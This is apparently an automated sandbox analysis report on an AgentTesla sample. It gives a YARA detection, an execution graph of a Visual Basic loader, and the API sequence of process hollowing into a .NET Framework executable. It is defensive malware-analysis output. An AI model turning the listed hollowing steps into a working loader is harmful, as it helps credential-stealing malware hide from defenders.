                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:22%
                                                                    Dynamic/Decrypted Code Coverage:9.4%
                                                                    Signature Coverage:6.5%
                                                                    Total number of Nodes:551
                                                                    Total number of Limit Nodes:67
                                                                    execution_graph 3166 54f3f4 __vbaChkstk 3167 54f43e 3166->3167 3170 57c48c __vbaChkstk 3167->3170 3171 57c4be 3170->3171 3172 57c4e4 3171->3172 3173 57c4cc __vbaNew2 3171->3173 3174 57c4eb __vbaChkstk __vbaChkstk 3172->3174 3173->3174 3175 57c53f 3174->3175 3176 57c564 3175->3176 3177 57c54a __vbaHresultCheckObj 3175->3177 3178 57c571 __vbaNew2 3176->3178 3179 57c589 3176->3179 3177->3176 3178->3179 3180 57c5a1 __vbaNew2 3179->3180 3181 57c5b9 3179->3181 3182 57c5c0 __vbaObjSetAddref 3180->3182 3181->3182 3183 57c5da 3182->3183 3184 57c5e5 __vbaHresultCheckObj 3183->3184 3185 57c5fc 3183->3185 3186 57c600 __vbaFreeObj 3184->3186 3185->3186 3189 57c62d __vbaChkstk 3186->3189 3188 54f443 3190 57c665 __vbaNew2 3189->3190 3191 57c680 3189->3191 3190->3191 3192 57c69e __vbaNew2 3191->3192 3193 57c6b9 3191->3193 3194 57c6c3 __vbaObjSetAddref 3192->3194 3193->3194 3195 57c6e0 3194->3195 3196 57c705 3195->3196 3197 57c6eb __vbaHresultCheckObj 3195->3197 3198 57c70c __vbaFreeObj 3196->3198 3197->3198 3298 54c087 __vbaChkstk 3198->3298 3200 57c71f 3202 57c73f __vbaAryLock #644 __vbaAryUnlock 3200->3202 3203 57c726 3200->3203 3201 57d0c9 __vbaAryUnlock 3201->3188 3204 57c782 3202->3204 3203->3201 3304 57d330 __vbaChkstk 3204->3304 3206 57c798 6 API calls 3206->3203 3207 57c7f3 __vbaObjSetAddref 3206->3207 3315 54c6e3 __vbaChkstk __vbaObjSetAddref 3207->3315 3210 57c823 __vbaFreeObj 3210->3203 3211 57c83f 3210->3211 3212 57c91d 3211->3212 3423 57d0e2 __vbaChkstk #595 __vbaVarMove __vbaFreeVarList 3211->3423 3213 57c995 3212->3213 3425 54c523 __vbaChkstk 3212->3425 3216 57ca05 3213->3216 3437 54db30 9 API calls 3213->3437 3219 57ca1a 3216->3219 3442 54bde0 __vbaChkstk 3216->3442 3222 57ca8a 3219->3222 3452 54c4c4 __vbaChkstk 3219->3452 3226 57cb03 3222->3226 3227 54c523 4 API calls 3222->3227 3223 57c9aa 3223->3216 3231 57d0e2 4 API calls 3223->3231 3224 57d0e2 4 API calls 3228 57c981 __vbaFreeVar 3224->3228 3230 57cb74 3226->3230 3460 57d22e __vbaChkstk 3226->3460 3232 57caa8 3227->3232 3435 40a4ec 3228->3435 3233 57cbed 3230->3233 3238 54c523 4 API calls 3230->3238 3236 57c9f1 __vbaFreeVar 3231->3236 3232->3226 3244 57d0e2 4 API calls 3232->3244 3240 57cc5e 3233->3240 3463 54dd70 52 API calls 3233->3463 3237 40a4ec 3236->3237 3243 57ca00 __vbaSetSystemError 3237->3243 3245 57cb92 3238->3245 3246 57cccf 3240->3246 3469 54c40e 6 API calls 3240->3469 3243->3216 3249 57caef __vbaFreeVar 3244->3249 3245->3233 3255 57d0e2 4 API calls 3245->3255 3257 57cf19 3246->3257 3263 57cd36 __vbaAryLock 3246->3263 3254 40a4ec 3249->3254 3251 57cc03 3251->3240 3264 57d0e2 4 API calls 3251->3264 3260 57cafe __vbaSetSystemError 3254->3260 3261 57cbd9 __vbaFreeVar 3255->3261 3262 57d039 #644 3257->3262 3269 57cfc7 3257->3269 3270 57cf53 3257->3270 3260->3226 3266 40a4ec 3261->3266 3512 54ac32 3262->3512 3473 54c5b5 6 API calls 3263->3473 3272 57cc4a __vbaFreeVar 3264->3272 3277 57cbe8 __vbaSetSystemError 3266->3277 3418 40a46c 3269->3418 3280 40a46c 155 API calls 3270->3280 3275 40a4ec 3272->3275 3274 57cd74 8 API calls 3483 54bf65 __vbaChkstk __vbaVarVargNofree __vbaStrVarVal #644 3274->3483 3282 57cc59 __vbaSetSystemError 3275->3282 3277->3233 3279 57d05c #644 3279->3203 3285 57cf61 __vbaSetSystemError __vbaAryLock 3280->3285 3282->3240 3283 57cfd5 __vbaSetSystemError __vbaAryLock 3288 54c229 24 API calls 3283->3288 3497 54c229 __vbaChkstk 3285->3497 3292 57d028 __vbaAryUnlock __vbaFreeVar 3288->3292 3292->3262 3513 54c16a __vbaChkstk 3298->3513 3300 54c0be #644 3301 54c0d3 3300->3301 3302 54c13e 3301->3302 3303 54c0d9 __vbaRedim __vbaAryLock #644 __vbaAryUnlock 3301->3303 3302->3200 3303->3302 3514 57d41b __vbaChkstk 3304->3514 3307 57d384 3307->3206 3308 57d386 #644 3519 54ac32 3308->3519 3310 57d3a0 #644 3520 54ac32 3310->3520 3312 57d3ba #644 3521 54ac32 3312->3521 3314 57d3d8 #644 #644 3314->3307 3316 54c73e 3315->3316 3317 54c763 3316->3317 3318 54c749 __vbaHresultCheckObj 3316->3318 3319 54c77d __vbaObjSetAddref 3317->3319 3358 54c778 6 API calls 3317->3358 3318->3317 3522 54e57d __vbaChkstk __vbaObjSetAddref __vbaVarMove 3319->3522 3321 54c793 7 API calls 3323 54e57d 17 API calls 3321->3323 3324 54c7e4 6 API calls 3323->3324 3325 54c83a 3324->3325 3326 54c845 __vbaHresultCheckObj 3325->3326 3327 54c85f 3325->3327 3326->3327 3328 54c8a6 3327->3328 3329 54c88c __vbaHresultCheckObj 3327->3329 3330 54c8d3 __vbaHresultCheckObj 3328->3330 3331 54c8ed 3328->3331 3329->3328 3332 54c8f4 __vbaObjSetAddref 3330->3332 3331->3332 3536 54e3be __vbaChkstk __vbaObjSetAddref 3332->3536 3334 54c906 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 3335 54e3be 10 API calls 3334->3335 3336 54c942 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref 3335->3336 3337 54e3be 10 API calls 3336->3337 3338 54c97e __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 3337->3338 3339 54c9c3 3338->3339 3340 54c9ce __vbaHresultCheckObj 3339->3340 3341 54c9e8 3339->3341 3340->3341 3342 54ca15 __vbaHresultCheckObj 3341->3342 3343 54ca2f 3341->3343 3342->3343 3344 54ca76 3343->3344 3345 54ca5c __vbaHresultCheckObj 3343->3345 3346 54cab7 3344->3346 3347 54ca9d __vbaHresultCheckObj 3344->3347 3345->3344 3348 54cabe __vbaRedim __vbaAryLock 3346->3348 3347->3348 3349 54cb0b 3348->3349 3350 54cb16 __vbaHresultCheckObj 3349->3350 3351 54cb30 3349->3351 3352 54cb37 __vbaAryUnlock 3350->3352 3351->3352 3353 54cb50 3352->3353 3354 54cb72 3352->3354 3545 54d6db __vbaChkstk __vbaVarVargNofree __vbaStrVarCopy __vbaStrMove 3353->3545 3356 54cb97 3354->3356 3354->3358 3589 54d40c __vbaChkstk 3354->3589 3356->3358 3359 54cbc3 __vbaHresultCheckObj 3356->3359 3360 54cbdd 3356->3360 3358->3210 3359->3360 3361 54cd3b __vbaAryLock #644 __vbaAryUnlock 3360->3361 3362 54cbfb __vbaRedim __vbaAryLock 3360->3362 3363 54cd76 3361->3363 3364 54cc48 3362->3364 3365 57d330 11 API calls 3363->3365 3366 54cc53 __vbaHresultCheckObj 3364->3366 3367 54cc6d 3364->3367 3368 54cd8c __vbaObjSet 3365->3368 3369 54cc74 __vbaAryUnlock 3366->3369 3367->3369 3370 54cdc5 3368->3370 3371 54cda2 __vbaRedim 3368->3371 3372 54cc8d 3369->3372 3373 54ccaf 3369->3373 3370->3358 3374 54ce00 __vbaAryLock 3370->3374 3371->3370 3375 54d6db 192 API calls 3372->3375 3373->3358 3376 54cce0 __vbaAryLock #644 __vbaAryUnlock 3373->3376 3377 54d40c 185 API calls 3373->3377 3378 54ce37 3374->3378 3379 54d1f8 3374->3379 3375->3373 3380 54cd1b 3376->3380 3381 54ccd4 3377->3381 3383 54ce57 __vbaHresultCheckObj 3378->3383 3384 54ce71 3378->3384 3386 54d21e __vbaHresultCheckObj 3379->3386 3387 54d238 3379->3387 3382 57d330 11 API calls 3380->3382 3381->3358 3381->3376 3385 54cd31 __vbaObjSet 3382->3385 3388 54ce78 8 API calls 3383->3388 3384->3388 3385->3361 3386->3387 3389 54d24f __vbaRedim __vbaAryLock 3387->3389 3390 54d2e9 __vbaAryUnlock 3387->3390 3391 54cf06 3388->3391 3392 54d2b4 3389->3392 3390->3358 3393 54cf11 __vbaHresultCheckObj 3391->3393 3394 54cf2b 3391->3394 3395 54d2bf __vbaHresultCheckObj 3392->3395 3396 54d2d9 3392->3396 3393->3394 3398 54cf52 __vbaHresultCheckObj 3394->3398 3399 54cf6c 3394->3399 3397 54d2e0 __vbaAryUnlock 3395->3397 3396->3397 3397->3390 3400 54cf73 7 API calls 3398->3400 3399->3400 3401 54cfee 3400->3401 3402 54d013 3401->3402 3403 54cff9 __vbaHresultCheckObj 3401->3403 3404 54d054 3402->3404 3405 54d03a __vbaHresultCheckObj 3402->3405 3403->3402 3406 54d05b 7 API calls 3404->3406 3405->3406 3407 54d0d6 3406->3407 3408 54d0e1 __vbaHresultCheckObj 3407->3408 3409 54d0fb 3407->3409 3408->3409 3410 54d142 3409->3410 3411 54d128 __vbaHresultCheckObj 3409->3411 3412 54d1f3 3410->3412 3413 54d159 __vbaRedim __vbaAryLock 3410->3413 3411->3410 3412->3390 3414 54d1be 3413->3414 3415 54d1e3 3414->3415 3416 54d1c9 __vbaHresultCheckObj 3414->3416 3417 54d1ea __vbaAryUnlock 3415->3417 3416->3417 3417->3412 3419 40a475 3418->3419 3421 54b8e6 155 API calls 3419->3421 3420 40a483 3422 54b8e6 155 API calls 3420->3422 3421->3420 3422->3420 3424 57c915 __vbaFreeVar 3423->3424 3424->3212 3426 54c537 3425->3426 3427 54c53c 3425->3427 3753 54a860 GetPEB 3426->3753 3433 54c559 3427->3433 3754 54a860 GetPEB 3427->3754 3431 54c597 3431->3213 3431->3224 3432 54c578 3432->3431 3756 54a7da GetPEB 3432->3756 3433->3432 3755 54a84c GetPEB 3433->3755 3436 40a4f5 3435->3436 3438 54dc88 3437->3438 3439 54dc91 __vbaVarDup #633 #635 __vbaFreeVarList 3438->3439 3440 54dc3c __vbaVarLateMemCallLd __vbaVarMove __vbaNextEachVar 3438->3440 3441 54dd1d __vbaAryUnlock __vbaFreeObj __vbaFreeVarList __vbaFreeVar __vbaFreeVar 3439->3441 3440->3438 3441->3223 3758 54bd68 __vbaChkstk __vbaRedim 3442->3758 3762 40a564 3452->3762 3764 40aa1c 3460->3764 3468 54e275 3463->3468 3464 54e291 __vbaStrVarVal #644 #644 3464->3468 3465 54e30c __vbaAryDestruct 3465->3251 3467 54e2cf __vbaSetSystemError __vbaFreeStr 3467->3468 3468->3464 3468->3465 3468->3467 3766 40a960 3469->3766 3768 57d1b6 __vbaChkstk __vbaVarVargNofree __vbaStrVarVal #644 __vbaFreeStr 3473->3768 3476 57d1b6 5 API calls 3477 54c646 3476->3477 3478 54c659 __vbaSetSystemError 3477->3478 3479 54c684 __vbaStrCopy 3478->3479 3480 54c66d #616 __vbaStrMove 3478->3480 3481 54c691 __vbaStrCopy 3479->3481 3480->3481 3482 54c6be __vbaFreeStr __vbaFreeStr 3481->3482 3482->3274 3770 40a530 3483->3770 3772 54c16a __vbaChkstk 3497->3772 3499 54c261 #644 3773 54ac4f 3499->3773 3501 54c288 VirtualAlloc __vbaRedim __vbaAryLock #644 __vbaAryUnlock 3774 54ac4f 3501->3774 3503 54c2ff __vbaAryLock #644 __vbaAryUnlock 3504 54c33b 3503->3504 3775 54c182 6 API calls 3504->3775 3512->3279 3513->3300 3515 57d457 __vbaRedim 3514->3515 3516 57d477 __vbaAryLock #644 __vbaAryUnlock 3514->3516 3515->3516 3518 57d36d 3516->3518 3518->3307 3518->3308 3519->3310 3520->3312 3521->3314 3523 54e5eb 3522->3523 3524 54e5f6 __vbaHresultCheckObj 3523->3524 3525 54e610 3523->3525 3526 54e617 __vbaVarCmpGt __vbaVarOr __vbaBoolVarNull __vbaFreeVar 3524->3526 3525->3526 3527 54e67d __vbaRedim __vbaAryLock 3526->3527 3528 54e678 __vbaFreeObj 3526->3528 3530 54e6ce 3527->3530 3528->3321 3531 54e6f3 3530->3531 3532 54e6d9 __vbaHresultCheckObj 3530->3532 3533 54e6fa __vbaAryUnlock 3531->3533 3532->3533 3601 54e4f3 __vbaChkstk #717 __vbaVarMove 3533->3601 3537 54e40d 3536->3537 3538 54e418 __vbaHresultCheckObj 3537->3538 3539 54e42f 3537->3539 3538->3539 3540 54e442 __vbaFreeObj 3539->3540 3541 54e444 #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar #644 3539->3541 3540->3334 3543 54e48e 3541->3543 3543->3540 3544 54e499 __vbaHresultCheckObj 3543->3544 3544->3540 3546 54d730 3545->3546 3547 54d75e 3546->3547 3548 54d748 __vbaNew2 3546->3548 3549 54d786 __vbaHresultCheckObj 3547->3549 3550 54d79d 3547->3550 3548->3547 3551 54d7a1 __vbaStrToAnsi 3549->3551 3550->3551 3603 40a760 3551->3603 3553 54d7bd __vbaSetSystemError __vbaFreeStrList 3554 54d7f2 3553->3554 3555 54da03 3553->3555 3556 54d80e 3554->3556 3557 54d7f8 __vbaNew2 3554->3557 3558 40a6b0 155 API calls 3555->3558 3562 54d836 __vbaHresultCheckObj 3556->3562 3563 54d84d 3556->3563 3557->3556 3559 54da18 __vbaSetSystemError __vbaLenBstr __vbaStrToAnsi 3558->3559 3560 40a8a0 155 API calls 3559->3560 3561 54da3d __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 3560->3561 3564 40a5b0 155 API calls 3561->3564 3565 54d851 __vbaStrToAnsi 3562->3565 3563->3565 3566 54da7e __vbaSetSystemError __vbaAryLock 3564->3566 3567 40a760 155 API calls 3565->3567 3568 40a630 155 API calls 3566->3568 3569 54d86d __vbaSetSystemError __vbaFreeStrList 3567->3569 3570 54dab7 __vbaSetSystemError __vbaAryUnlock __vbaRedimPreserve 3568->3570 3569->3555 3571 54d8a2 3569->3571 3588 54d9fe __vbaFreeObj __vbaFreeStr 3570->3588 3572 54d8be 3571->3572 3573 54d8a8 __vbaNew2 3571->3573 3575 54d8e6 __vbaHresultCheckObj 3572->3575 3576 54d8fd 3572->3576 3573->3572 3577 54d901 __vbaStrToAnsi 3575->3577 3576->3577 3578 40a760 155 API calls 3577->3578 3579 54d91d __vbaSetSystemError __vbaFreeStrList 3578->3579 3579->3555 3580 54d952 3579->3580 3581 54d96e 3580->3581 3582 54d958 __vbaNew2 3580->3582 3583 54d996 __vbaHresultCheckObj 3581->3583 3584 54d9ad 3581->3584 3582->3581 3585 54d9b1 __vbaStrToAnsi 3583->3585 3584->3585 3586 40a760 155 API calls 3585->3586 3587 54d9cd __vbaSetSystemError __vbaFreeStrList 3586->3587 3587->3555 3587->3588 3588->3354 3590 54d44c 3589->3590 3591 54d4ce __vbaAryLock #644 __vbaAryUnlock #644 3589->3591 3751 54d38a __vbaChkstk __vbaRefVarAry __vbaUbound __vbaVarMove 3590->3751 3745 54ac32 3591->3745 3595 54d516 __vbaRedim __vbaAryLock __vbaAryLock 3746 40a820 3595->3746 3597 54d582 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaVarMove __vbaVarTstEq 3597->3595 3598 54d5e8 7 API calls 3597->3598 3599 54d67d 3598->3599 3600 54d6b2 __vbaFreeVar __vbaAryDestruct 3599->3600 3600->3356 3602 54e55e __vbaVarMove 3601->3602 3602->3528 3604 40a769 3603->3604 3608 54b8e6 __vbaChkstk #644 3604->3608 3605 40a777 3607 54b8e6 155 API calls 3605->3607 3607->3605 3631 54ac32 3608->3631 3610 54b92f #644 3632 54ac32 3610->3632 3612 54b957 #644 3633 54ee42 11 API calls 3612->3633 3614 54b96e __vbaChkstk 3669 54bc0e __vbaChkstk __vbaVarDup 3614->3669 3616 54b997 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaChkstk 3617 54bc0e 11 API calls 3616->3617 3618 54b9dc __vbaStrVarMove __vbaStrMove __vbaFreeVar 3617->3618 3619 54ba24 3618->3619 3620 54ba0e __vbaNew2 3618->3620 3621 54ba85 3619->3621 3622 54ba6e __vbaHresultCheckObj 3619->3622 3620->3619 3623 54ba89 __vbaFreeVar #644 #644 3621->3623 3622->3623 3676 54e785 14 API calls 3623->3676 3625 54bab4 #644 3626 54ee42 56 API calls 3625->3626 3627 54badf 3626->3627 3714 54bb2d __vbaChkstk 3627->3714 3629 54bae8 __vbaFreeVar 3630 54bb00 __vbaFreeStr __vbaFreeObj __vbaFreeStr 3629->3630 3630->3605 3631->3610 3632->3612 3636 54ef01 3633->3636 3634 54ef74 __vbaObjSetAddref #644 __vbaFreeObj #644 3722 54ac32 3634->3722 3635 54ef30 __vbaAryLock #644 __vbaAryUnlock 3635->3636 3636->3634 3636->3635 3638 54efa8 __vbaAryLock #644 __vbaAryUnlock #644 3723 54ac32 3638->3723 3640 54eff4 __vbaRedim #644 3724 54ac32 3640->3724 3642 54f041 #644 3725 54ac32 3642->3725 3644 54f067 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3645 54f0cf __vbaHresultCheckObj 3644->3645 3646 54f0eb 3644->3646 3647 54f0ef 7 API calls 3645->3647 3646->3647 3726 54ac32 3647->3726 3649 54f155 __vbaFreeStr __vbaFreeVar 3652 54f172 3649->3652 3650 54f194 __vbaAryLock #644 __vbaAryUnlock 3650->3652 3651 54f1d9 #644 3727 54ac4f 3651->3727 3652->3650 3652->3651 3654 54f1fd #644 3728 54ac4f 3654->3728 3656 54f221 #644 3729 54ac4f 3656->3729 3658 54f245 #644 3730 54ac4f 3658->3730 3660 54f269 #644 3731 54ac4f 3660->3731 3662 54f28d VirtualProtect 3663 54f2e5 __vbaHresultCheckObj 3662->3663 3667 54f304 3662->3667 3663->3667 3664 54f37f #644 3666 54f396 3664->3666 3665 54f33a __vbaAryLock #644 __vbaAryUnlock 3665->3667 3668 54f3c9 __vbaAryDestruct __vbaAryDestruct 3666->3668 3667->3664 3667->3665 3668->3614 3670 54bc47 #644 __vbaI4Var 3669->3670 3671 54bc62 3670->3671 3672 54bce7 __vbaVarAdd __vbaVarMove 3671->3672 3673 54bca4 #697 __vbaVarCat __vbaVarMove __vbaFreeVar 3671->3673 3674 54bca2 __vbaFreeVar 3671->3674 3672->3670 3673->3671 3674->3616 3679 54e851 3676->3679 3677 54e8c4 __vbaObjSetAddref #644 __vbaFreeObj #644 3732 54ac32 3677->3732 3678 54e880 __vbaAryLock #644 __vbaAryUnlock 3678->3679 3679->3677 3679->3678 3681 54e8f3 __vbaAryLock #644 __vbaAryUnlock #644 3682 54e93f 3681->3682 3733 54ae5b __vbaRedim 3682->3733 3684 54e95c #644 3734 54ac32 3684->3734 3686 54e97d #644 3735 54ac32 3686->3735 3688 54e9a5 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3689 54ea04 __vbaHresultCheckObj 3688->3689 3690 54ea1b 3688->3690 3691 54ea1f 7 API calls 3689->3691 3690->3691 3736 54ac32 3691->3736 3693 54ea8d __vbaFreeStr __vbaFreeVar 3696 54eaac 3693->3696 3694 54eb16 #644 3737 54ac32 3694->3737 3695 54eace __vbaAryLock #644 __vbaAryUnlock 3695->3696 3696->3694 3696->3695 3698 54eb38 #644 3738 54ac32 3698->3738 3700 54eb5a #644 3739 54ac32 3700->3739 3702 54eb7c #644 3740 54ac32 3702->3740 3704 54eb9e #644 3741 54ac32 3704->3741 3706 54ebbd #644 #644 3707 54ec18 3706->3707 3708 54ec23 __vbaHresultCheckObj 3707->3708 3712 54ec3a 3707->3712 3708->3712 3709 54ecb7 #644 3711 54ecce 3709->3711 3710 54ec6f __vbaAryLock #644 __vbaAryUnlock 3710->3712 3713 54ecf7 __vbaAryDestruct __vbaFreeObj 3711->3713 3712->3709 3712->3710 3713->3625 3742 54c16a __vbaChkstk 3714->3742 3716 54bb64 #644 #644 3743 54ac32 3716->3743 3718 54bb91 #644 3744 54ac4f 3718->3744 3720 54bbb7 #644 3721 54bbdf 3720->3721 3721->3629 3722->3638 3723->3640 3724->3642 3725->3644 3726->3649 3727->3654 3728->3656 3729->3658 3730->3660 3731->3662 3732->3681 3733->3684 3734->3686 3735->3688 3736->3693 3737->3698 3738->3700 3739->3702 3740->3704 3741->3706 3742->3716 3743->3718 3744->3720 3745->3595 3747 40a829 3746->3747 3749 54b8e6 155 API calls 3747->3749 3748 40a837 3750 54b8e6 155 API calls 3748->3750 3749->3748 3750->3748 3752 54d3ed __vbaVarAdd __vbaVarSub __vbaI4Var __vbaFreeVarList 3751->3752 3752->3591 3753->3427 3754->3433 3755->3432 3757 54a7e8 3756->3757 3757->3431 3759 54bdc1 __vbaFreeVar #644 3758->3759 3760 40a5f0 3759->3760 3761 40a5f9 3760->3761 3763 40a56d 3762->3763 3763->3763 3765 40aa25 3764->3765 3765->3765 3767 40a969 3766->3767 3769 54c62d 3768->3769 3769->3476 3771 40a539 3770->3771 3772->3499 3773->3501 3774->3503 3776 54c20a __vbaAryLock #644 __vbaAryUnlock 3775->3776 3777 54ac41 3776->3777 3778 54ac49 __vbaI4Var 3777->3778 3779 57c3a9 3778->3779 3780 2272b06 3781 2272b17 3780->3781 3800 22730d7 GetPEB 3781->3800 3783 2272b46 3784 2272fcb 3783->3784 3785 22730d7 GetPEB 3783->3785 3786 2272b61 3785->3786 3786->3784 3787 2272ccd NtCreateSection 3786->3787 3787->3784 3788 2272d04 NtMapViewOfSection 3787->3788 3788->3784 3789 2272d2c 3788->3789 3790 2272e8f GetPEB 3789->3790 3793 2272dca 3789->3793 3790->3793 3791 2272eb2 CreateProcessW 3791->3784 3792 2272ed5 NtGetContextThread 3791->3792 3792->3793 3794 2272ef6 NtReadVirtualMemory 3792->3794 3793->3791 3795 2272fbc NtTerminateProcess 3793->3795 3794->3793 3796 2272f1c NtWriteVirtualMemory 3794->3796 3795->3793 3796->3793 3797 2272f42 NtUnmapViewOfSection NtMapViewOfSection 3796->3797 3797->3793 3798 2272f76 NtSetContextThread 3797->3798 3798->3793 3799 2272fa7 NtResumeThread 3798->3799 3799->3784 3799->3793 3801 22730ec 3800->3801 3801->3783 3802 54ad9f __vbaChkstk 3803 54ade9 3802->3803 3811 57c3b4 __vbaChkstk 3803->3811 3807 54ae13 3858 57c415 __vbaChkstk 3807->3858 3862 54a57f 3811->3862 3814 54af1d 11 API calls 3873 54ed1f __vbaChkstk __vbaVarDup #653 __vbaI4Var __vbaFreeVar 3814->3873 3816 54afe7 11 API calls 3817 54ed1f 10 API calls 3816->3817 3818 54b089 45 API calls 3817->3818 3821 54b2dc 3818->3821 3819 54b317 __vbaAryLock #644 __vbaAryUnlock 3819->3821 3820 54b361 __vbaObjSetAddref #644 __vbaFreeObj #644 3878 54ac4f 3820->3878 3821->3819 3821->3820 3823 54b3a6 __vbaAryLock #644 __vbaAryUnlock #644 3879 54ac32 3823->3879 3825 54b404 __vbaRedim #644 3880 54ac32 3825->3880 3827 54b454 #644 3881 54ac32 3827->3881 3829 54b488 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3830 54b4fd __vbaHresultCheckObj 3829->3830 3831 54b51e 3829->3831 3832 54b525 __vbaAryUnlock __vbaFreeStr #644 3830->3832 3831->3832 3835 54b55d 3832->3835 3833 54b5e8 #644 3882 54ac32 3833->3882 3834 54b59a __vbaAryLock #644 __vbaAryUnlock 3834->3835 3835->3833 3835->3834 3837 54b616 #644 3883 54ac32 3837->3883 3839 54b644 #644 3884 54ac32 3839->3884 3841 54b672 #644 3885 54ac32 3841->3885 3843 54b6a0 #644 3886 54ac32 3843->3886 3845 54b6ce VirtualProtect 3846 54b731 __vbaHresultCheckObj 3845->3846 3849 54b752 3845->3849 3846->3849 3847 54b7e4 #644 3887 54ac32 3847->3887 3848 54b796 __vbaAryLock #644 __vbaAryUnlock 3848->3849 3849->3847 3849->3848 3851 54b806 #644 3888 54ac32 3851->3888 3853 54b81d #644 3854 54b840 3853->3854 3855 54bb2d 6 API calls 3854->3855 3856 54b849 __vbaFreeVar 3855->3856 3857 54b8cb __vbaAryDestruct 3856->3857 3857->3807 3889 40a920 3858->3889 3863 54a5a1 3862->3863 3871 54ab35 GetPEB 3863->3871 3865 54a5ab 3866 54a600 NtAllocateVirtualMemory 3865->3866 3867 54a623 NtProtectVirtualMemory 3865->3867 3866->3867 3868 54a61e __vbaFreeVar 3866->3868 3867->3868 3870 54a64e 3867->3870 3868->3814 3869 54a6e7 NtProtectVirtualMemory 3869->3868 3870->3869 3872 54ab47 3871->3872 3872->3865 3874 54ed89 3873->3874 3875 54ed9a #632 __vbaVarCat __vbaVarMove __vbaFreeVarList 3874->3875 3876 54edeb __vbaFreeVar 3874->3876 3875->3874 3876->3816 3878->3823 3879->3825 3880->3827 3881->3829 3882->3837 3883->3839 3884->3841 3885->3843 3886->3845 3887->3851 3888->3853 3890 40a929 3889->3890 3892 54b8e6 155 API calls 3890->3892 3891 40a937 3893 54b8e6 155 API calls 3891->3893 3892->3891 3893->3891

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 564 2272b06-2272b4c call 2272fd4 call 22730d7 569 2272b52-2272b68 call 22730d7 564->569 570 2272fcb-2272fd1 564->570 569->570 573 2272b6e-2272c5b call 2273028 * 12 569->573 573->570 598 2272c61-2272c64 573->598 598->570 599 2272c6a-2272c6d 598->599 599->570 600 2272c73-2272c76 599->600 600->570 601 2272c7c-2272c7f 600->601 601->570 602 2272c85-2272c88 601->602 602->570 603 2272c8e-2272c91 602->603 603->570 604 2272c97-2272c9a 603->604 604->570 605 2272ca0-2272ca3 604->605 605->570 606 2272ca9-2272cac 605->606 606->570 607 2272cb2-2272cb4 606->607 607->570 608 2272cba-2272cc8 607->608 609 2272ccd-2272cfe NtCreateSection 608->609 610 2272cca 608->610 609->570 611 2272d04-2272d26 NtMapViewOfSection 609->611 610->609 611->570 612 2272d2c-2272d62 call 22730b8 611->612 615 2272d64-2272d6a 612->615 616 2272d9a-2272dc4 call 2273115 call 22730b8 612->616 617 2272d6f-2272d73 615->617 627 2272e8f-2272e9b GetPEB 616->627 628 2272dca-2272e41 616->628 619 2272d75-2272d88 call 22730b8 617->619 620 2272d8b-2272d98 617->620 619->620 620->616 623 2272d6c 620->623 623->617 629 2272e9e-2272ea5 627->629 631 2272e43-2272e53 628->631 632 2272eb2-2272ecf CreateProcessW 629->632 631->631 633 2272e55-2272e58 631->633 632->570 634 2272ed5-2272ef0 NtGetContextThread 632->634 635 2272e66-2272e6a 633->635 636 2272fb7-2272fba 634->636 637 2272ef6-2272f16 NtReadVirtualMemory 634->637 640 2272e6c 635->640 641 2272e5a-2272e65 635->641 638 2272fc3-2272fc6 636->638 639 2272fbc-2272fc0 NtTerminateProcess 636->639 637->636 642 2272f1c-2272f40 NtWriteVirtualMemory 637->642 638->632 639->638 643 2272e79-2272e7e 640->643 641->635 642->636 644 2272f42-2272f74 NtUnmapViewOfSection NtMapViewOfSection 642->644 647 2272e80-2272e8d 643->647 648 2272e6e-2272e78 643->648 645 2272f76-2272fa5 NtSetContextThread 644->645 646 2272fb4 644->646 645->646 649 2272fa7-2272fb2 NtResumeThread 645->649 646->636 647->629 648->643 649->570 649->646
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02272ECA
                                                                    • NtGetContextThread.NTDLL(?,?), ref: 02272EE9
                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 02272F0F
                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02272F39
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02272F54
                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272F6D
                                                                    • NtSetContextThread.NTDLL(?,00010003), ref: 02272F9E
                                                                    • NtResumeThread.NTDLL(?,00000000), ref: 02272FAB
                                                                    • NtTerminateProcess.NTDLL(?,00000000), ref: 02272FC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$ThreadView$ContextCreateMemoryProcessVirtual$ReadResumeTerminateUnmapWrite
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1528524012-1087957892
                                                                    • Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction ID: bcc731b665bc34dc9f5e59819ee4afb0fdab247b20d834b0364fc7b1f2a7b7e0
